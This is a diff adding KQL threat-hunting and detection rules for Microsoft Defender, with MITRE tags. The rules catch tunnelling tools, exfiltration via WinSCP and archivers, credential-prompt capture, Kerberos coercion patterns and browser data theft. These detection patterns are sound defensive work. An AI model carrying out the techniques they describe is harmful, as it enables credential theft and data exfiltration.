detection.threat-hunting +// False Positives: +// - Legitimate administrators using one of these tools + +DeviceProcessEvents +| where FolderPath endswith "\\httptunnel.exe" or FolderPath endswith "\\plink.exe" or FolderPath endswith "\\socat.exe" or FolderPath endswith "\\stunnel.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Exfiltration/winscp_execution_from_non_standard_folder.kql b/KQL/rules-threat-hunting/Exfiltration/winscp_execution_from_non_standard_folder.kql new file mode 100644 index 00000000..a71b0772 --- /dev/null +++ b/KQL/rules-threat-hunting/Exfiltration/winscp_execution_from_non_standard_folder.kql @@ -0,0 +1,10 @@ +// Title: Winscp Execution From Non Standard Folder +// Author: frack113 +// Date: 2025-10-12 +// Level: medium +// Description: Detects the execution of Winscp from an a non standard folder. This could indicate the execution of Winscp portable. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1048, detection.threat-hunting + +DeviceProcessEvents +| where (FolderPath endswith "\\WinSCP.exe" or ProcessVersionInfoOriginalFileName =~ "winscp.exe") and (not(FolderPath startswith "C:\\Program Files (x86)\\WinSCP\\")) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Impact/process_terminated_via_taskkill.kql b/KQL/rules-threat-hunting/Impact/process_terminated_via_taskkill.kql new file mode 100644 index 00000000..c86edd2e --- /dev/null +++ b/KQL/rules-threat-hunting/Impact/process_terminated_via_taskkill.kql @@ -0,0 +1,14 @@ +// Title: Process Terminated Via Taskkill +// Author: frack113, MalGamy (Nextron Systems), Nasreddine Bencherchali +// Date: 2021-12-26 +// Level: low +// Description: Detects execution of "taskkill.exe" in order to stop a service or a process. Look for suspicious parents executing this command in order to hunt for potential malicious activity. +Attackers might leverage this in order to conduct data destruction or data encrypted for impact on the data stores of services like Exchange and SQL Server. + +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1489, detection.threat-hunting +// False Positives: +// - Expected FP with some processes using this techniques to terminate one of their processes during installations and updates + +DeviceProcessEvents +| where ((ProcessCommandLine contains " -im " or ProcessCommandLine contains " /im " or ProcessCommandLine contains " –im " or ProcessCommandLine contains " —im " or ProcessCommandLine contains " ―im " or ProcessCommandLine contains " -pid " or ProcessCommandLine contains " /pid " or ProcessCommandLine contains " –pid " or ProcessCommandLine contains " —pid " or ProcessCommandLine contains " ―pid ") and (ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f " or ProcessCommandLine contains " –f " or ProcessCommandLine contains " —f " or ProcessCommandLine contains " ―f " or ProcessCommandLine endswith " -f" or ProcessCommandLine endswith " /f" or ProcessCommandLine endswith " –f" or ProcessCommandLine endswith " —f" or ProcessCommandLine endswith " ―f") and (FolderPath endswith "\\taskkill.exe" or ProcessVersionInfoOriginalFileName =~ "taskkill.exe")) and (not(((InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp") and InitiatingProcessFolderPath endswith ".tmp"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Initial Access/webdav_temporary_local_file_creation.kql b/KQL/rules-threat-hunting/Initial Access/webdav_temporary_local_file_creation.kql new file mode 100644 index 00000000..95fb738b --- /dev/null +++ b/KQL/rules-threat-hunting/Initial Access/webdav_temporary_local_file_creation.kql @@ -0,0 +1,12 @@ +// Title: WebDAV Temporary Local File Creation +// Author: Micah Babinski +// Date: 2023-08-21 +// Level: medium +// Description: Detects the creation of WebDAV temporary files with potentially suspicious extensions +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.resource-development, attack.t1584, attack.t1566, detection.threat-hunting +// False Positives: +// - Legitimate use of WebDAV in an environment + +DeviceFileEvents +| where FolderPath contains "\\AppData\\Local\\Temp\\TfsStore\\Tfs_DAV\\" and (FolderPath endswith ".7z" or FolderPath endswith ".bat" or FolderPath endswith ".dat" or FolderPath endswith ".ico" or FolderPath endswith ".js" or FolderPath endswith ".lnk" or FolderPath endswith ".ps1" or FolderPath endswith ".rar" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".zip") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Lateral Movement/smb_over_quic_via_net_exe.kql b/KQL/rules-threat-hunting/Lateral Movement/smb_over_quic_via_net_exe.kql new file mode 100644 index 00000000..61ecdb7a --- /dev/null +++ b/KQL/rules-threat-hunting/Lateral Movement/smb_over_quic_via_net_exe.kql @@ -0,0 +1,12 @@ +// Title: SMB over QUIC Via Net.EXE +// Author: frack113 +// Date: 2023-07-21 +// Level: medium +// Description: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1570, detection.threat-hunting +// False Positives: +// - Administrative activity + +DeviceProcessEvents +| where ProcessCommandLine contains "/TRANSPORT:QUIC" and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Persistence/execution_from_webserver_root_folder.kql b/KQL/rules-threat-hunting/Persistence/execution_from_webserver_root_folder.kql new file mode 100644 index 00000000..ff89e930 --- /dev/null +++ b/KQL/rules-threat-hunting/Persistence/execution_from_webserver_root_folder.kql @@ -0,0 +1,14 @@ +// Title: Execution From Webserver Root Folder +// Author: Florian Roth (Nextron Systems) +// Date: 2019-01-16 +// Level: medium +// Description: Detects a program executing from a web server root folder. Use this rule to hunt for potential interesting activity such as webshell or backdoors + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1505.003, detection.threat-hunting +// False Positives: +// - Various applications +// - Tools that include ping or nslookup command invocations + +DeviceProcessEvents +| where (FolderPath contains "\\wwwroot\\" or FolderPath contains "\\wmpub\\" or FolderPath contains "\\htdocs\\") and (not(((FolderPath contains "bin\\" or FolderPath contains "\\Tools\\" or FolderPath contains "\\SMSComponent\\") and InitiatingProcessFolderPath endswith "\\services.exe"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Persistence/shell_context_menu_command_tampering.kql b/KQL/rules-threat-hunting/Persistence/shell_context_menu_command_tampering.kql new file mode 100644 index 00000000..630a326e --- /dev/null +++ b/KQL/rules-threat-hunting/Persistence/shell_context_menu_command_tampering.kql @@ -0,0 +1,12 @@ +// Title: Shell Context Menu Command Tampering +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-03-06 +// Level: low +// Description: Detects changes to shell context menu commands. Use this rule to hunt for potential anomalies and suspicious shell commands. +// MITRE Tactic: Persistence +// Tags: attack.persistence, detection.threat-hunting +// False Positives: +// - Likely from new software installation suggesting to add context menu items. Such as "PowerShell", "Everything", "Git", etc. + +DeviceRegistryEvents +| where RegistryKey endswith "\\Software\\Classes*" and RegistryKey endswith "\\shell*" and RegistryKey endswith "\\command*" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Persistence/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql b/KQL/rules-threat-hunting/Persistence/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql new file mode 100644 index 00000000..5814347e --- /dev/null +++ b/KQL/rules-threat-hunting/Persistence/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql @@ -0,0 +1,15 @@ +// Title: Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location +// Author: Swachchhanda Shrawan Poudel +// Date: 2024-09-02 +// Level: low +// Description: Detects the loading of the "taskschd.dll" module from a process that located in a potentially suspicious or uncommon directory. +The loading of this DLL might indicate that the application have the capability to create a scheduled task via the "Schedule.Service" COM object. +Investigation of the loading application and its behavior is required to determining if its malicious. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1053.005, detection.threat-hunting +// False Positives: +// - Some installers might generate false positives, apply additional filters accordingly. + +DeviceImageLoadEvents +| where (FolderPath endswith "\\taskschd.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "taskschd.dll") and (InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or InitiatingProcessFolderPath contains "\\Desktop\\" or InitiatingProcessFolderPath contains "\\Downloads\\") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Privilege Escalation/elevated_system_shell_spawned.kql b/KQL/rules-threat-hunting/Privilege Escalation/elevated_system_shell_spawned.kql new file mode 100644 index 00000000..89247aee --- /dev/null +++ b/KQL/rules-threat-hunting/Privilege Escalation/elevated_system_shell_spawned.kql @@ -0,0 +1,11 @@ +// Title: Elevated System Shell Spawned +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2023-11-23 +// Level: medium +// Description: Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges. Use this rule to hunt for potential suspicious processes. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.execution, attack.t1059, detection.threat-hunting + +DeviceProcessEvents +| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "powershell_ise.EXE", "pwsh.dll", "Cmd.Exe"))) and (LogonId =~ "0x3e7" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Resource Development/creation_of_an_executable_by_an_executable.kql b/KQL/rules-threat-hunting/Resource Development/creation_of_an_executable_by_an_executable.kql new file mode 100644 index 00000000..e2b6695b --- /dev/null +++ b/KQL/rules-threat-hunting/Resource Development/creation_of_an_executable_by_an_executable.kql @@ -0,0 +1,14 @@ +// Title: Creation of an Executable by an Executable +// Author: frack113 +// Date: 2022-03-09 +// Level: low +// Description: Detects the creation of an executable by another executable. +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1587.001, detection.threat-hunting +// False Positives: +// - Software installers +// - Update utilities +// - 32bit applications launching their 64bit versions + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith ".exe" and FolderPath endswith ".exe") and (not(((InitiatingProcessFolderPath contains ":\\ProgramData\\Microsoft\\Windows Defender\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Windows Defender\\") or (InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework" and InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and FolderPath contains ":\\Windows\\assembly") or (InitiatingProcessFolderPath endswith ":\\Windows\\System32\\msiexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\system32\\cleanmgr.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\dxgiadaptercache.exe" or InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\Dism.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\wuauclt.exe") or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\GitHubDesktop\\Update.exe" and FolderPath contains "\\AppData\\Local\\SquirrelTemp\\") or ((InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\") and InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and FolderPath contains ":\\Windows\\assembly\\NativeImages_") or ((InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\") or (FolderPath contains ":\\Program Files\\" or FolderPath contains ":\\Program Files (x86)\\")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\Update.exe" and (FolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\stage\\Teams.exe" or FolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\stage\\Squirrel.exe" or FolderPath endswith "\\AppData\\Local\\Microsoft\\SquirrelTemp\\tempb\\")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\AppData\\Local\\Temp\\") or (InitiatingProcessFolderPath contains ":\\Windows\\WinSxS\\" and InitiatingProcessFolderPath endswith "\\TiWorker.exe") or (InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\svchost.exe" and FolderPath contains ":\\Windows\\SoftwareDistribution\\Download\\") or (InitiatingProcessFolderPath endswith ":\\Windows\\system32\\svchost.exe" and (FolderPath contains ":\\WUDownloadCache\\" and FolderPath contains "\\WindowsUpdateBox.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\" and InitiatingProcessFolderPath endswith "\\Microsoft VS Code\\Code.exe" and FolderPath contains "\\.vscode\\extensions\\") or FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\" or (InitiatingProcessFolderPath contains ":\\WINDOWS\\TEMP\\" or FolderPath contains ":\\WINDOWS\\TEMP\\") or (InitiatingProcessFolderPath contains ":\\WINDOWS\\SoftwareDistribution\\Download\\" and InitiatingProcessFolderPath endswith "\\WindowsUpdateBox.Exe" and FolderPath contains ":\\$WINDOWS.~BT\\Sources\\")))) and (not(((InitiatingProcessFolderPath endswith "\\ChromeSetup.exe" and FolderPath contains "\\Google") or (InitiatingProcessFolderPath contains "\\Python27\\python.exe" and (FolderPath contains "\\Python27\\Lib\\site-packages\\" or FolderPath contains "\\Python27\\Scripts\\" or FolderPath contains "\\AppData\\Local\\Temp\\")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\SquirrelTemp\\Update.exe" and FolderPath contains "\\AppData\\Local")))) \ No newline at end of file diff --git a/KQL/rules/Collection/7zip_compressing_dump_files.kql b/KQL/rules/Collection/7zip_compressing_dump_files.kql new file mode 100644 index 00000000..5d6b1c5e --- /dev/null +++ b/KQL/rules/Collection/7zip_compressing_dump_files.kql @@ -0,0 +1,13 @@ +// Title: 7Zip Compressing Dump Files +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-27 +// Level: medium +// Description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1560.001 +// False Positives: +// - Legitimate use of 7z with a command line in which ".dmp" or ".dump" appears accidentally +// - Legitimate use of 7z to compress WER ".dmp" files for troubleshooting + +DeviceProcessEvents +| where (ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe"))) \ No newline at end of file diff --git a/KQL/rules/Collection/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql b/KQL/rules/Collection/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql new file mode 100644 index 00000000..48f96a88 --- /dev/null +++ b/KQL/rules/Collection/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql @@ -0,0 +1,17 @@ +// Title: Attempts of Kerberos Coercion Via DNS SPN Spoofing +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-06-20 +// Level: high +// Description: Detects the presence of "UWhRC....AAYBAAAA" pattern in command line. +The pattern "1UWhRCAAAAA..BAAAA" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure. +Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts. +It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records +to spoof Service Principal Names (SPNs) and redirect authentication requests like in CVE-2025-33073. +If you see this pattern in the command line, it is likely an attempt to add spoofed Service Principal Names (SPNs) to DNS records, +or checking for the presence of such records through the `nslookup` command. + +// MITRE Tactic: Collection +// Tags: attack.collection, attack.credential-access, attack.persistence, attack.privilege-escalation, attack.t1557.001, attack.t1187 + +DeviceProcessEvents +| where ProcessCommandLine contains "UWhRCA" and ProcessCommandLine contains "BAAAA" \ No newline at end of file diff --git a/KQL/rules/Collection/audio_capture_via_powershell.kql b/KQL/rules/Collection/audio_capture_via_powershell.kql new file mode 100644 index 00000000..0fdfc724 --- /dev/null +++ b/KQL/rules/Collection/audio_capture_via_powershell.kql @@ -0,0 +1,12 @@ +// Title: Audio Capture via PowerShell +// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-10-24 +// Level: medium +// Description: Detects audio capture via PowerShell Cmdlet. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1123 +// False Positives: +// - Legitimate audio capture by legitimate user. + +DeviceProcessEvents +| where ProcessCommandLine contains "WindowsAudioDevice-Powershell-Cmdlet" or ProcessCommandLine contains "Toggle-AudioDevice" or ProcessCommandLine contains "Get-AudioDevice " or ProcessCommandLine contains "Set-AudioDevice " or ProcessCommandLine contains "Write-AudioDevice " \ No newline at end of file diff --git a/KQL/rules/Collection/audio_capture_via_soundrecorder.kql b/KQL/rules/Collection/audio_capture_via_soundrecorder.kql new file mode 100644 index 00000000..631ccf07 --- /dev/null +++ b/KQL/rules/Collection/audio_capture_via_soundrecorder.kql @@ -0,0 +1,12 @@ +// Title: Audio Capture via SoundRecorder +// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community +// Date: 2019-10-24 +// Level: medium +// Description: Detect attacker collecting audio via SoundRecorder application. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1123 +// False Positives: +// - Legitimate audio capture by legitimate user. + +DeviceProcessEvents +| where ProcessCommandLine contains "/FILE" and FolderPath endswith "\\SoundRecorder.exe" \ No newline at end of file diff --git a/KQL/rules/Collection/automated_collection_command_prompt.kql b/KQL/rules/Collection/automated_collection_command_prompt.kql new file mode 100644 index 00000000..4bbf1e5c --- /dev/null +++ b/KQL/rules/Collection/automated_collection_command_prompt.kql @@ -0,0 +1,10 @@ +// Title: Automated Collection Command Prompt +// Author: frack113 +// Date: 2021-07-28 +// Level: medium +// Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1119, attack.credential-access, attack.t1552.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".docx" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xlsx" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".pptx" or ProcessCommandLine contains ".rtf" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".txt") and ((ProcessCommandLine contains "dir " and ProcessCommandLine contains " /b " and ProcessCommandLine contains " /s ") or ((ProcessCommandLine contains " /e " or ProcessCommandLine contains " /si ") and ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE")) \ No newline at end of file diff --git a/KQL/rules/Collection/clipboard_collection_with_xclip_tool.kql b/KQL/rules/Collection/clipboard_collection_with_xclip_tool.kql new file mode 100644 index 00000000..62d56887 --- /dev/null +++ b/KQL/rules/Collection/clipboard_collection_with_xclip_tool.kql @@ -0,0 +1,14 @@ +// Title: Clipboard Collection with Xclip Tool +// Author: Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +// Date: 2021-10-15 +// Level: low +// Description: Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. +Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. + +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1115 +// False Positives: +// - Legitimate usage of xclip tools. + +DeviceProcessEvents +| where (ProcessCommandLine contains "-sel" and ProcessCommandLine contains "clip" and ProcessCommandLine contains "-o") and FolderPath contains "xclip" \ No newline at end of file diff --git a/KQL/rules/Collection/clipboard_data_collection_via_osascript.kql b/KQL/rules/Collection/clipboard_data_collection_via_osascript.kql new file mode 100644 index 00000000..6a388610 --- /dev/null +++ b/KQL/rules/Collection/clipboard_data_collection_via_osascript.kql @@ -0,0 +1,12 @@ +// Title: Clipboard Data Collection Via OSAScript +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-01-31 +// Level: high +// Description: Detects possible collection of data from the clipboard via execution of the osascript binary +// MITRE Tactic: Collection +// Tags: attack.collection, attack.execution, attack.t1115, attack.t1059.002 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "osascript" and ProcessCommandLine contains " -e " and ProcessCommandLine contains "clipboard" \ No newline at end of file diff --git a/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql b/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql new file mode 100644 index 00000000..7e685676 --- /dev/null +++ b/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql @@ -0,0 +1,12 @@ +// Title: Compress Data and Lock With Password for Exfiltration With 7-ZIP +// Author: frack113 +// Date: 2021-07-27 +// Level: medium +// Description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1560.001 +// False Positives: +// - Legitimate activity is expected since compressing files with a password is common. + +DeviceProcessEvents +| where (ProcessCommandLine contains " a " or ProcessCommandLine contains " u ") and (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe"))) and ProcessCommandLine contains " -p" \ No newline at end of file diff --git a/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql b/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql new file mode 100644 index 00000000..e2d30117 --- /dev/null +++ b/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql @@ -0,0 +1,10 @@ +// Title: Compress Data and Lock With Password for Exfiltration With WINZIP +// Author: frack113 +// Date: 2021-07-27 +// Level: medium +// Description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1560.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains " -min " or ProcessCommandLine contains " -a ") and ProcessCommandLine contains "-s\"" and (ProcessCommandLine contains "winzip.exe" or ProcessCommandLine contains "winzip64.exe") \ No newline at end of file diff --git a/KQL/rules/Collection/compressed_file_creation_via_tar_exe.kql b/KQL/rules/Collection/compressed_file_creation_via_tar_exe.kql new file mode 100644 index 00000000..8bbba7e0 --- /dev/null +++ b/KQL/rules/Collection/compressed_file_creation_via_tar_exe.kql @@ -0,0 +1,14 @@ +// Title: Compressed File Creation Via Tar.EXE +// Author: Nasreddine Bencherchali (Nextron Systems), AdmU3 +// Date: 2023-12-19 +// Level: low +// Description: Detects execution of "tar.exe" in order to create a compressed file. +Adversaries may abuse various utilities to compress or encrypt data before exfiltration. + +// MITRE Tactic: Collection +// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001 +// False Positives: +// - Likely + +DeviceProcessEvents +| where (ProcessCommandLine contains "-c" or ProcessCommandLine contains "-r" or ProcessCommandLine contains "-u") and (FolderPath endswith "\\tar.exe" or ProcessVersionInfoOriginalFileName =~ "bsdtar") \ No newline at end of file diff --git a/KQL/rules/Collection/compressed_file_extraction_via_tar_exe.kql b/KQL/rules/Collection/compressed_file_extraction_via_tar_exe.kql new file mode 100644 index 00000000..eb7cef68 --- /dev/null +++ b/KQL/rules/Collection/compressed_file_extraction_via_tar_exe.kql @@ -0,0 +1,14 @@ +// Title: Compressed File Extraction Via Tar.EXE +// Author: AdmU3 +// Date: 2023-12-19 +// Level: low +// Description: Detects execution of "tar.exe" in order to extract compressed file. +Adversaries may abuse various utilities in order to decompress data to avoid detection. + +// MITRE Tactic: Collection +// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001 +// False Positives: +// - Likely + +DeviceProcessEvents +| where ProcessCommandLine contains "-x" and (FolderPath endswith "\\tar.exe" or ProcessVersionInfoOriginalFileName =~ "bsdtar") \ No newline at end of file diff --git a/KQL/rules/Collection/data_copied_to_clipboard_via_clip_exe.kql b/KQL/rules/Collection/data_copied_to_clipboard_via_clip_exe.kql new file mode 100644 index 00000000..ef212c65 --- /dev/null +++ b/KQL/rules/Collection/data_copied_to_clipboard_via_clip_exe.kql @@ -0,0 +1,10 @@ +// Title: Data Copied To Clipboard Via Clip.EXE +// Author: frack113 +// Date: 2021-07-27 +// Level: low +// Description: Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1115 + +DeviceProcessEvents +| where FolderPath endswith "\\clip.exe" or ProcessVersionInfoOriginalFileName =~ "clip.exe" \ No newline at end of file diff --git a/KQL/rules/Collection/esentutl_steals_browser_information.kql b/KQL/rules/Collection/esentutl_steals_browser_information.kql new file mode 100644 index 00000000..e4a5393d --- /dev/null +++ b/KQL/rules/Collection/esentutl_steals_browser_information.kql @@ -0,0 +1,12 @@ +// Title: Esentutl Steals Browser Information +// Author: frack113 +// Date: 2022-02-13 +// Level: medium +// Description: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1005 +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where (ProcessCommandLine contains "-r" or ProcessCommandLine contains "/r" or ProcessCommandLine contains "–r" or ProcessCommandLine contains "—r" or ProcessCommandLine contains "―r") and (FolderPath endswith "\\esentutl.exe" or ProcessVersionInfoOriginalFileName =~ "esentutl.exe") and ProcessCommandLine contains "\\Windows\\WebCache" \ No newline at end of file diff --git a/KQL/rules/Collection/files_added_to_an_archive_using_rar_exe.kql b/KQL/rules/Collection/files_added_to_an_archive_using_rar_exe.kql new file mode 100644 index 00000000..60d93348 --- /dev/null +++ b/KQL/rules/Collection/files_added_to_an_archive_using_rar_exe.kql @@ -0,0 +1,12 @@ +// Title: Files Added To An Archive Using Rar.EXE +// Author: Timur Zinniatullin, E.M. Anhaus, oscd.community +// Date: 2019-10-21 +// Level: low +// Description: Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1560.001 +// False Positives: +// - Highly likely if rar is a default archiver in the monitored environment. + +DeviceProcessEvents +| where ProcessCommandLine contains " a " and FolderPath endswith "\\rar.exe" \ No newline at end of file diff --git a/KQL/rules/Collection/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql b/KQL/rules/Collection/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql new file mode 100644 index 00000000..a5bf0696 --- /dev/null +++ b/KQL/rules/Collection/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql @@ -0,0 +1,12 @@ +// Title: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2021-07-20 +// Level: medium +// Description: Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. +An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. + +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1074.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath $env:TEMP") or (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\") or (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath" and ProcessCommandLine contains ":\\Windows\\Temp\\") \ No newline at end of file diff --git a/KQL/rules/Collection/gui_input_capture_macos.kql b/KQL/rules/Collection/gui_input_capture_macos.kql new file mode 100644 index 00000000..fad2568a --- /dev/null +++ b/KQL/rules/Collection/gui_input_capture_macos.kql @@ -0,0 +1,12 @@ +// Title: GUI Input Capture - macOS +// Author: remotephone, oscd.community +// Date: 2020-10-13 +// Level: low +// Description: Detects attempts to use system dialog prompts to capture user credentials +// MITRE Tactic: Collection +// Tags: attack.collection, attack.credential-access, attack.t1056.002 +// False Positives: +// - Legitimate administration tools and activities + +DeviceProcessEvents +| where FolderPath =~ "/usr/sbin/osascript" and (ProcessCommandLine contains "-e" and ProcessCommandLine contains "display" and ProcessCommandLine contains "dialog" and ProcessCommandLine contains "answer") and (ProcessCommandLine contains "admin" or ProcessCommandLine contains "administrator" or ProcessCommandLine contains "authenticate" or ProcessCommandLine contains "authentication" or ProcessCommandLine contains "credentials" or ProcessCommandLine contains "pass" or ProcessCommandLine contains "password" or ProcessCommandLine contains "unlock") \ No newline at end of file diff --git a/KQL/rules/Collection/hacktool_adcspwn_execution.kql b/KQL/rules/Collection/hacktool_adcspwn_execution.kql new file mode 100644 index 00000000..95eee526 --- /dev/null +++ b/KQL/rules/Collection/hacktool_adcspwn_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - ADCSPwn Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2021-07-31 +// Level: high +// Description: Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to 